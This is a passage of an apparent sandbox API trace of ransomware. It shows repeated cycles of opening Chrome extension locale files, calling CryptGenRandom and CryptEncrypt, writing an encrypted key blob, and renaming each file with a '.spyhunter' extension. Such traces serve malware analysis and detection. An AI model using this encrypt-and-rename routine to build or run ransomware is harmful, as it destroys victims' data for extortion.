lpNumberOfBytesWritten=0x248f5c4*=0xe5, lpOverlapped=0x0) returned 1 [0136.145] GetProcessHeap () returned 0x2c0000 [0136.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.145] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.145] WriteFile (in: hFile=0x188, lpBuffer=0x248f604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5c4, lpOverlapped=0x0 | out: lpBuffer=0x248f604*, lpNumberOfBytesWritten=0x248f5c4*=0x4, lpOverlapped=0x0) returned 1 [0136.145] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5c4*=0x30, lpOverlapped=0x0) returned 1 [0136.146] CloseHandle (hObject=0x188) returned 1 [0136.146] GetProcessHeap () returned 0x2c0000 [0136.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.166] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.spyhunter") returned 169 [0136.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.spyhunter")) returned 1 [0136.167] GetProcessHeap () returned 0x2c0000 [0136.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.167] GetProcessHeap () returned 0x2c0000 [0136.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.167] GetProcessHeap () returned 0x2c0000 [0136.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80f88 | out: hHeap=0x2c0000) returned 1 [0136.168] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f600 | out: pbBuffer=0x248f600) returned 1 [0136.168] GetProcessHeap () returned 0x2c0000 [0136.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.168] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5f8*=0x30) returned 1 [0136.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json") returned 155 [0136.169] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.169] GetProcessHeap () returned 0x2c0000 [0136.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.169] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5bc*=0xe5, lpOverlapped=0x0) returned 1 [0136.170] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.170] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x248f5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5bc*=0xe5, lpOverlapped=0x0) returned 1 [0136.170] GetProcessHeap () returned 0x2c0000 [0136.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.170] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.170] WriteFile (in: hFile=0x188, lpBuffer=0x248f5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5bc, lpOverlapped=0x0 | out: lpBuffer=0x248f5fc*, lpNumberOfBytesWritten=0x248f5bc*=0x4, lpOverlapped=0x0) returned 1 [0136.170] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5bc*=0x30, lpOverlapped=0x0) returned 1 [0136.170] CloseHandle (hObject=0x188) returned 1 [0136.170] GetProcessHeap () returned 0x2c0000 [0136.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.171] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.spyhunter") returned 165 [0136.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0136.171] GetProcessHeap () returned 0x2c0000 [0136.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.172] GetProcessHeap () returned 0x2c0000 [0136.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.172] GetProcessHeap () returned 0x2c0000 [0136.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f420 | out: hHeap=0x2c0000) returned 1 [0136.173] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5f8 | out: pbBuffer=0x248f5f8) returned 1 [0136.173] GetProcessHeap () returned 0x2c0000 [0136.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.173] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5f0*=0x30) returned 1 [0136.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json") returned 158 [0136.174] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.174] GetProcessHeap () returned 0x2c0000 [0136.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.174] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5b4*=0xd5, lpOverlapped=0x0) returned 1 [0136.175] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.175] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x248f5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5b4*=0xd5, lpOverlapped=0x0) returned 1 [0136.175] GetProcessHeap () returned 0x2c0000 [0136.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.175] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.175] WriteFile (in: hFile=0x188, lpBuffer=0x248f5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5b4, lpOverlapped=0x0 | out: lpBuffer=0x248f5f4*, lpNumberOfBytesWritten=0x248f5b4*=0x4, lpOverlapped=0x0) returned 1 [0136.175] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5b4*=0x30, lpOverlapped=0x0) returned 1 [0136.175] CloseHandle (hObject=0x188) returned 1 [0136.175] GetProcessHeap () returned 0x2c0000 [0136.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.175] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.spyhunter") returned 168 [0136.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.spyhunter")) returned 1 [0136.176] GetProcessHeap () returned 0x2c0000 [0136.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.176] GetProcessHeap () returned 0x2c0000 [0136.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.176] GetProcessHeap () returned 0x2c0000 [0136.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fbc8 | out: hHeap=0x2c0000) returned 1 [0136.177] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5f0 | out: pbBuffer=0x248f5f0) returned 1 [0136.177] GetProcessHeap () returned 0x2c0000 [0136.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.178] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5e8*=0x30) returned 1 [0136.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0136.178] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.178] GetProcessHeap () returned 0x2c0000 [0136.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.178] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5ac*=0xd5, lpOverlapped=0x0) returned 1 [0136.274] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.274] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x248f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5ac*=0xd5, lpOverlapped=0x0) returned 1 [0136.274] GetProcessHeap () returned 0x2c0000 [0136.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.274] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.274] WriteFile (in: hFile=0x188, lpBuffer=0x248f5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5ac, lpOverlapped=0x0 | out: lpBuffer=0x248f5ec*, lpNumberOfBytesWritten=0x248f5ac*=0x4, lpOverlapped=0x0) returned 1 [0136.274] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5ac*=0x30, lpOverlapped=0x0) returned 1 [0136.274] CloseHandle (hObject=0x188) returned 1 [0136.274] GetProcessHeap () returned 0x2c0000 [0136.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.274] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.spyhunter") returned 168 [0136.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.spyhunter")) returned 1 [0136.275] GetProcessHeap () returned 0x2c0000 [0136.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.275] GetProcessHeap () returned 0x2c0000 [0136.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.275] GetProcessHeap () returned 0x2c0000 [0136.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fa40 | out: hHeap=0x2c0000) returned 1 [0136.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5e8 | out: pbBuffer=0x248f5e8) returned 1 [0136.277] GetProcessHeap () returned 0x2c0000 [0136.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5e0*=0x30) returned 1 [0136.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.277] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0136.277] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.277] GetProcessHeap () returned 0x2c0000 [0136.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.278] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5a4*=0xe4, lpOverlapped=0x0) returned 1 [0136.279] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.279] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x248f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5a4*=0xe4, lpOverlapped=0x0) returned 1 [0136.279] GetProcessHeap () returned 0x2c0000 [0136.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.279] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.279] WriteFile (in: hFile=0x188, lpBuffer=0x248f5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5a4, lpOverlapped=0x0 | out: lpBuffer=0x248f5e4*, lpNumberOfBytesWritten=0x248f5a4*=0x4, lpOverlapped=0x0) returned 1 [0136.279] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5a4*=0x30, lpOverlapped=0x0) returned 1 [0136.279] CloseHandle (hObject=0x188) returned 1 [0136.280] GetProcessHeap () returned 0x2c0000 [0136.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.280] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.spyhunter") returned 165 [0136.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0136.280] GetProcessHeap () returned 0x2c0000 [0136.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.281] GetProcessHeap () returned 0x2c0000 [0136.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.281] GetProcessHeap () returned 0x2c0000 [0136.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3eb8 | out: hHeap=0x2c0000) returned 1 [0136.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5e0 | out: pbBuffer=0x248f5e0) returned 1 [0136.282] GetProcessHeap () returned 0x2c0000 [0136.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5d8*=0x30) returned 1 [0136.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0136.283] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.283] GetProcessHeap () returned 0x2c0000 [0136.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.283] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f59c*=0xda, lpOverlapped=0x0) returned 1 [0136.284] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.284] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x248f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f59c*=0xda, lpOverlapped=0x0) returned 1 [0136.284] GetProcessHeap () returned 0x2c0000 [0136.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.284] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.284] WriteFile (in: hFile=0x188, lpBuffer=0x248f5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f59c, lpOverlapped=0x0 | out: lpBuffer=0x248f5dc*, lpNumberOfBytesWritten=0x248f59c*=0x4, lpOverlapped=0x0) returned 1 [0136.284] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f59c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f59c*=0x30, lpOverlapped=0x0) returned 1 [0136.284] CloseHandle (hObject=0x188) returned 1 [0136.284] GetProcessHeap () returned 0x2c0000 [0136.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.284] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.spyhunter") returned 165 [0136.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 